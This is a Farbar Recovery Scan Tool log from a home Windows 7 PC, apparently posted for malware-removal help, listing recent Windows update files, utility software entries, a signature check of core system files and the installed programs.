2015-02-11 05:46 - 2015-01-11 19:43 - 14401024 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-02-11 05:46 - 2015-01-11 19:36 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2015-02-11 05:46 - 2015-01-11 19:29 - 04300800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2015-02-11 05:46 - 2015-01-11 19:27 - 02358272 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-02-11 05:46 - 2015-01-11 19:22 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2015-02-11 05:46 - 2015-01-11 19:14 - 12829184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-02-11 05:46 - 2015-01-11 19:02 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-02-11 05:46 - 2015-01-11 19:00 - 01888256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-02-11 05:45 - 2015-02-03 21:16 - 00894976 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2015-02-11 05:45 - 2015-02-03 21:16 - 00762368 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2015-02-11 05:45 - 2015-02-03 21:16 - 00609280 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2015-02-11 05:45 - 2015-02-03 21:16 - 00414720 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2015-02-11 05:45 - 2015-02-03 21:16 - 00227328 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2015-02-11 05:45 - 2015-02-03 21:16 - 00192000 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2015-02-11 05:45 - 2015-02-03 21:13 - 01098752 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2015-02-11 05:45 - 2015-01-27 17:36 - 01239720 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2015-02-11 05:45 - 2015-01-10 00:48 - 00728064 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2015-02-11 05:45 - 2015-01-10 00:48 - 00341504 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-02-11 05:45 - 2015-01-10 00:48 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2015-02-11 05:45 - 2015-01-10 00:48 - 00309760 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2015-02-11 05:45 - 2015-01-10 00:48 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2015-02-11 05:45 - 2015-01-10 00:48 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2015-02-11 05:45 - 2015-01-10 00:48 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2015-02-11 05:45 - 2015-01-10 00:27 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2015-02-11 05:45 - 2015-01-10 00:27 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2015-02-11 05:45 - 2015-01-10 00:27 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2015-02-11 05:45 - 2015-01-10 00:27 - 00221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2015-02-11 05:45 - 2015-01-10 00:27 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2015-02-11 05:45 - 2015-01-10 00:27 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2015-02-11 05:45 - 2015-01-10 00:27 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2015-02-11 05:44 - 2015-01-15 02:14 - 00155072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2015-02-11 05:44 - 2015-01-15 02:14 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2015-02-11 05:44 - 2015-01-15 02:09 - 01461760 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2015-02-11 05:44 - 2015-01-15 02:09 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2015-02-11 05:44 - 2015-01-15 02:09 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2015-02-11 05:44 - 2015-01-15 02:09 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2015-02-11 05:44 - 2015-01-15 02:09 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2015-02-11 05:44 - 2015-01-15 02:08 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2015-02-11 05:44 - 2015-01-15 02:06 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2015-02-11 05:44 - 2015-01-15 02:06 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2015-02-11 05:44 - 2015-01-15 02:04 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2015-02-11 05:44 - 2015-01-15 01:42 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2015-02-11 05:44 - 2015-01-15 01:42 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2015-02-11 05:44 - 2015-01-15 01:41 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2015-02-11 05:44 - 2015-01-15 01:39 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2015-02-11 05:44 - 2015-01-15 01:39 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2015-02-11 05:44 - 2015-01-15 01:37 - 00686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2015-02-11 05:44 - 2015-01-14 22:22 - 00458824 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2015-02-11 05:44 - 2015-01-12 21:10 - 01424384 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2015-02-11 05:44 - 2015-01-12 20:49 - 01230336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2015-02-11 05:43 - 2014-12-11 23:31 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2015-02-11 05:43 - 2014-12-11 23:07 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2015-02-11 05:43 - 2014-07-06 20:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2015-02-11 05:43 - 2014-07-06 20:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2015-02-11 05:43 - 2014-07-06 19:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2015-02-11 05:43 - 2014-07-06 19:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2015-02-11 05:42 - 2014-11-25 21:53 - 00861696 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2015-02-11 05:42 - 2014-11-25 21:32 - 00571904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2015-02-11 05:40 - 2014-12-07 21:09 - 00406528 _____ (Microsoft Corporation) C:\Windows\system32\scesrv.dll
2015-02-11 05:40 - 2014-12-07 20:46 - 00308224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scesrv.dll
2015-02-11 05:39 - 2015-01-14 00:09 - 05554112 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-02-11 05:39 - 2015-01-14 00:05 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2015-02-11 05:39 - 2015-01-14 00:05 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2015-02-11 05:39 - 2015-01-14 00:04 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2015-02-11 05:39 - 2015-01-13 23:44 - 03972544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2015-02-11 05:39 - 2015-01-13 23:44 - 03917760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2015-02-11 05:39 - 2015-01-13 23:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2015-02-11 05:37 - 2015-01-08 20:03 - 03201536 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-02-10 07:38 - 2015-02-10 07:38 - 00000000 ____D () C:\ProgramData\Commtouch
2015-02-10 07:38 - 2015-02-10 07:38 - 00000000 ____D () C:\Program Files\Common Files\Commtouch
2015-02-10 07:38 - 2014-08-12 23:38 - 00032912 _____ (EldoS Corporation) C:\Windows\system32\Drivers\rawdsk3.sys
2015-02-10 07:38 - 2014-03-25 15:59 - 01728776 ____R (CYREN Inc.) C:\Windows\system32\Drivers\ampse.sys
2015-02-10 07:21 - 2015-02-10 07:21 - 00001487 _____ () C:\Users\Becky's\Desktop\LiveBoost.lnk
2015-02-09 17:14 - 2015-02-10 07:32 - 00000340 _____ () C:\Windows\Tasks\HPCeeScheduleForBecky's.job
2015-02-09 17:14 - 2015-02-09 17:14 - 00003198 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForBecky's
2015-02-09 14:47 - 2015-02-12 03:56 - 00000000 ____D () C:\Windows\system32\appraiser
2015-02-01 18:45 - 2014-10-17 20:05 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2015-02-01 18:45 - 2014-10-17 19:33 - 03209728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2015-02-01 18:45 - 2014-07-06 20:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2015-02-01 18:45 - 2014-07-06 20:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2015-02-01 18:45 - 2014-07-06 20:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2015-02-01 18:45 - 2014-07-06 20:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2015-02-01 18:45 - 2014-07-06 19:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2015-02-01 18:45 - 2014-07-06 19:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2015-02-01 18:45 - 2014-07-06 19:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2015-02-01 18:45 - 2014-07-06 19:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2015-02-01 16:11 - 2014-12-18 21:06 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2015-02-01 16:11 - 2014-12-18 19:46 - 00141312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2015-02-01 16:11 - 2014-12-05 22:17 - 00303616 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll
2015-02-01 16:11 - 2014-12-05 21:50 - 00156672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncsi.dll
2015-02-01 16:11 - 2014-12-05 21:50 - 00052224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlaapi.dll
2015-02-01 16:11 - 2014-10-29 20:03 - 00165888 _____ (Microsoft Corporation) C:\Windows\system32\charmap.exe
2015-02-01 16:11 - 2014-10-29 19:45 - 00155136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\charmap.exe
2015-02-01 16:05 - 2014-12-11 11:47 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2015-02-01 16:05 - 2014-11-10 19:46 - 00119296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2015-02-01 16:05 - 2014-10-02 20:12 - 02020352 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2015-02-01 16:05 - 2014-10-02 20:12 - 00346624 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2015-02-01 16:05 - 2014-10-02 20:12 - 00310272 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2015-02-01 16:05 - 2014-10-02 20:12 - 00181248 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2015-02-01 16:05 - 2014-10-02 20:11 - 00266240 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2015-02-01 16:05 - 2014-10-02 19:45 - 01177088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2015-02-01 16:05 - 2014-10-02 19:45 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2015-02-01 16:05 - 2014-10-02 19:45 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2015-02-01 16:05 - 2014-10-02 19:45 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2015-02-01 16:05 - 2014-10-02 19:44 - 00198656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe
2015-02-01 15:57 - 2014-11-07 21:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2015-02-01 15:57 - 2014-11-07 20:45 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-02-12 08:57 - 2013-01-27 19:06 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-02-12 08:46 - 2009-07-13 22:45 - 00018736 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-02-12 08:46 - 2009-07-13 22:45 - 00018736 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-02-12 08:39 - 2010-10-09 17:47 - 00000429 _____ () C:\Windows\SysWOW64\iolo.ini.txt
2015-02-12 08:38 - 2011-04-18 20:04 - 00124744 _____ () C:\Windows\PFRO.log
2015-02-12 08:38 - 2010-12-01 15:01 - 00001261 _____ () C:\Windows\setupact.log
2015-02-12 08:38 - 2009-07-13 23:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-02-12 08:36 - 2009-08-23 00:40 - 01940350 _____ () C:\Windows\WindowsUpdate.log
2015-02-12 07:07 - 2010-12-01 16:35 - 00000000 ____D () C:\ProgramData\Malwarebytes
2015-02-12 04:59 - 2009-07-13 21:20 - 00000000 ____D () C:\Windows\rescache
2015-02-12 04:06 - 2009-07-13 22:45 - 00346088 _____ () C:\Windows\system32\FNTCACHE.DAT
2015-02-12 03:56 - 2014-05-06 02:01 - 00000000 ___SD () C:\Windows\system32\CompatTel
2015-02-12 03:25 - 2013-08-15 02:03 - 00000000 ____D () C:\Windows\system32\MRT
2015-02-12 03:11 - 2010-01-28 19:58 - 116773704 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2015-02-11 23:52 - 2010-12-01 16:35 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2015-02-11 23:44 - 2013-02-01 18:52 - 00310272 ___SH () C:\Users\Becky's\Desktop\Thumbs.db
2015-02-11 23:44 - 2011-10-23 19:09 - 00000008 __RSH () C:\Users\Becky's\ntuser.pol
2015-02-11 23:44 - 2010-01-13 16:30 - 00000000 ____D () C:\Users\Becky's
2015-02-11 23:31 - 2009-07-13 21:20 - 00000000 ___HD () C:\Windows\system32\GroupPolicy
2015-02-11 15:09 - 2014-03-14 10:51 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2015-02-11 07:46 - 2010-02-04 14:59 - 00000052 _____ () C:\Windows\SysWOW64\DOErrors.log
2015-02-10 16:50 - 2013-01-27 19:06 - 00701616 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-02-10 16:50 - 2013-01-27 19:06 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-02-10 16:50 - 2011-09-18 17:58 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-02-10 07:31 - 2012-04-25 12:12 - 00000386 _____ () C:\Windows\system32\ioloBootDefrag.cfg
2015-02-10 07:31 - 2010-10-09 17:41 - 00000000 ____D () C:\ProgramData\iolo
2015-02-10 07:21 - 2010-10-09 17:43 - 00001483 _____ () C:\Users\Becky's\Desktop\System Mechanic Professional.lnk
2015-02-10 07:21 - 2010-10-09 17:43 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Mechanic Professional
2015-02-10 07:19 - 2013-12-15 11:49 - 00000000 ____D () C:\ProgramData\ioloGovernor
2015-02-10 07:19 - 2013-12-15 11:48 - 00003144 _____ () C:\Windows\System32\Tasks\iolo Process Governor
2015-02-10 07:19 - 2010-10-09 17:41 - 00000000 ____D () C:\Users\Becky's\AppData\Roaming\iolo
2015-02-09 19:43 - 2014-11-19 08:48 - 00000000 ____D () C:\Windows\Minidump
2015-02-09 17:12 - 2011-11-02 17:16 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2015-02-09 15:00 - 2011-07-04 09:26 - 00000000 ____D () C:\Users\Becky's\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DiskInternals
2015-02-09 14:47 - 2009-07-13 21:20 - 00000000 ____D () C:\Windows\AppCompat
2015-02-09 14:46 - 2009-07-13 21:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2015-02-01 15:07 - 2009-07-13 23:13 - 00796158 _____ () C:\Windows\system32\PerfStringBackup.INI

==================== Files in the root of some directories =======

2010-01-13 17:20 - 2014-10-06 19:22 - 0001050 _____ () C:\Users\Becky's\AppData\Roaming\wklnhst.dat
2013-10-06 16:06 - 2013-10-06 16:06 - 0000095 _____ () C:\Users\Becky's\AppData\Local\fusioncache.dat
2010-12-01 14:44 - 2013-08-05 16:14 - 0007617 _____ () C:\Users\Becky's\AppData\Local\Resmon.ResmonCfg
2011-04-26 18:50 - 2011-04-26 18:50 - 0238344 _____ () C:\Users\Becky's\AppData\Local\tmp0416011527.0
2011-04-26 18:50 - 2011-04-26 18:50 - 0220848 _____ () C:\Users\Becky's\AppData\Local\tmp0416011527.1
2011-04-26 18:50 - 2011-04-26 18:50 - 0223076 _____ () C:\Users\Becky's\AppData\Local\tmp0416011527.2
2011-04-26 18:50 - 2011-04-26 18:50 - 0220847 _____ () C:\Users\Becky's\AppData\Local\tmp0416011527.JPG
2013-01-15 16:01 - 2013-01-15 16:01 - 1256617 _____ () C:\Users\Becky's\AppData\Local\tmpPICTURE 054.JPG

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-02-09 15:46

==================== End Of Log ============================

 

addition

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 11-02-2015 02
Ran by Becky's at 2015-02-12 09:22:59
Running from C:\Users\Becky's\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: System Shield (Enabled - Up to date) {3030810C-E2AC-B12D-8BB1-B1B8C0193798}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: System Shield (Enabled - Up to date) {8B5160E8-C496-BEA3-B101-8ACABB9E7D25}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.0.3.13070 - Adobe Systems Inc.)
Adobe Flash Player 16 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.06) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.06 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{F5266D28-E0B2-4130-BFC5-EE155AD514DC}) (Version: 2.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
AVSDK5 (Version: 5.4.11 - CYREN Inc.) Hidden
Belarc Advisor 8.1 (HKLM-x32\...\Belarc Advisor) (Version:  - )
Belkin N1 Wireless Desktop Card (HKLM-x32\...\{15EEFF80-97EC-43C4-BDD4-50E4A8E3117D}) (Version: 1.00.0000 - Belkin)
Canon Easy-PhotoPrint EX (HKLM-x32\...\Easy-PhotoPrint EX) (Version: 4.1.5 - Canon Inc.)
Canon Inkjet Printer Driver Add-On Module V2.00 (HKLM\...\CANONIJINBOXADDON200) (Version:  - )
Canon iP2600 series (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_iP2600_series) (Version:  - )
Canon iP2600 series User Registration (HKLM-x32\...\Canon iP2600 series User Registration) (Version:  - )
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)
Canon Utilities Solution Menu (HKLM-x32\...\CanonSolutionMenu) (Version:  - )
CCleaner (HKLM\...\CCleaner) (Version: 3.01 - Piriform)
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
CyberLink DVD Suite Deluxe (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 6.0.3101 - CyberLink Corp.)
DirectX for Managed Code Update (Summer 2004) (x32 Version: 9.02.2904 - Microsoft) Hidden
ffdshow [rev 2527] [2008-12-19] (HKLM-x32\...\ffdshow_is1) (Version: 1.0 - )
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.3.12286.3436 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.0.71 - WildTangent)
HP MediaSmart Demo (HKLM-x32\...\{9DEF9686-CCB2-47B7-BF83-B49EA21FA016}) (Version: 1.00.0000 - Hewlett-Packard)
HP MediaSmart DVD (HKLM-x32\...\InstallShield_{DCCAD079-F92C-44DA-B258-624FC6517A5A}) (Version: 3.0.3123 - Hewlett-Packard)
HP MediaSmart Movie Themes (HKLM-x32\...\InstallShield_{3023EBDA-BF1B-4831-B347-E5018555F26E}) (Version: 3.0.3102 - Hewlett-Packard)
HP MediaSmart Music/Photo/Video (HKLM-x32\...\InstallShield_{B2EE25B9-5B00-4ACF-94F0-92433C28C39E}) (Version: 3.0.3205 - Hewlett-Packard)
HP MediaSmart SmartMenu (HKLM\...\{26280024-DFB7-4967-90DB-7F9C6660D01E}) (Version: 3.0.28.2 - Hewlett-Packard)
HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Remote Solution (HKLM-x32\...\HP Remote Solution) (Version: 1.1.9.0 - TopSeed)
HP Setup (HKLM-x32\...\{F3B912F5-EB57-45AA-B3D1-EB532BCF6EF8}) (Version: 1.2.3220.3079 - Hewlett-Packard)
HP Support Information (HKLM-x32\...\{B9A03B7B-E0FF-4FB3-BA83-762E58A1B0AA}) (Version: 10.1.0002 - Hewlett-Packard)
HP Update (HKLM-x32\...\{D46D081B-F60E-467E-A7C4-117B70D76731}) (Version: 5.001.000.014 - Hewlett-Packard)
iolo technologies' System Mechanic Professional (HKLM-x32\...\{BBD3F66B-1180-4785-B679-3F91572CD3B4}_is1) (Version: 14.0.1 - iolo technologies, LLC)
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1901 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.1901 - CyberLink Corp.) Hidden
LightScribe System Software (HKLM-x32\...\{DD6C316A-FE75-4FBB-9D22-4C1920232B72}) (Version: 1.18.5.1 - LightScribe)
Logitech Harmony Remote Software (HKLM-x32\...\{634F79E1-2A41-4C40-9E8D-89EC740AC9D6}) (Version: 1.0.110307 - Logitech)
Logitech Harmony Remote Software 7 (HKLM-x32\...\{5C6F884D-680C-448B-B4C9-22296EE1B206}) (Version: 7.7.0.0 - Logitech)
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Microsoft .NET Framework 1.1 (HKLM-x32\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft IntelliPoint 8.2 (HKLM\...\Microsoft IntelliPoint 8.2) (Version: 8.20.468.0 - Microsoft Corporation)
Microsoft Office Home and Student 60 day trial (HKLM\...\OfficeTrial) (Version:  - )
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM\...\{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
